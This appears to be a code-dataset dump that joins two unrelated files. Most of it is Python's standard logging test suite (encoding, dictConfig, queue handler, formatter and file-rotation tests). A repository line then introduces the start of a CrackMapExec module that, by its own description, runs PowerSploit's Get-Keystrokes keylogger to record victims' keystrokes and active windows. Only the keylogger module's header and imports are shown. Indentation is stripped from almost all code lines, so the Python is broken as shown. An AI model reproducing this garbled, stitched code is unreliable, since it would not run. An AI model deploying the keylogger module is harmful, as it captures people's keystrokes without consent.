class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
        # Write non-ASCII data through a FileHandler created with an explicit
        # encoding and check that the same characters are read back.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = io.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
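    # config9a and config9b are incremental updates: because they set
    # 'incremental': True, dictConfig() only adjusts the levels of the
    # already-configured handler and logger rather than replacing them.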
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
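    # A cfg:// value is resolved against the configuration dictionary itself:
    # 'cfg://true_formatters' points at the top-level 'true_formatters' mapping
    # and 'cfg://handler_configs[hand1]' indexes into 'handler_configs' by key.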
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
        self.assertTrue(os.path.exists(filename),
                        msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
        # If maxBytes is zero, rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".1")
rh.emit(self.next_rec())
self.assertLogFile(self.fn + ".2")
self.assertFalse(os.path.exists(self.fn + ".3"))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# test methods added below
pass
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
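# For example, secs(days=4, hours=24) == 432000, i.e. five whole days in seconds.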
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
import time
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
FormatterTest,
LogRecordFactoryTest, ChildLoggerTest, QueueHandlerTest,
RotatingFileHandlerTest,
LastResortTest,
TimedRotatingFileHandlerTest
)
if __name__ == "__main__":
test_main()
| apache-2.0 |
Waffle-Wrath/CrackMapExec | cme/modules/get_keystrokes.py | 1 | 4647 | from cme.helpers.powershell import *
from cme.helpers.misc import gen_random_string
from cme.servers.smb import CMESMBServer
from gevent import sleep
from sys import exit
import os
class CMEModule:
'''
Executes PowerSploit's Get-Keystrokes script
Module by @byt3bl33d3r
'''
name = 'get_keystrokes'
description = "Logs keys pressed, time and the active window"
